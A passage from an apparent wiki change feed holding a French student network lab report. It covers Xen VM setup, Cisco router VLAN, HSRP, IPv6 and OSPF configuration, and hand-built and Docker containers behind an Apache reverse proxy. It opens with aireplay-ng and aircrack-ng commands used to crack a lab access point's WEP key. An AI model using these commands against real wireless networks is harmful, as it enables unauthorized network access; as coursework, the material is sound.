* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
router ospf 1&lt;br /&gt;
 router-id 10.60.11.252&lt;br /&gt;
 log-adjacency-changes&lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
 redistribute connected subnets&lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49094</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49094"/>
				<updated>2018-12-21T15:20:09Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.5 Interconnexion avec Internet IPv4 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
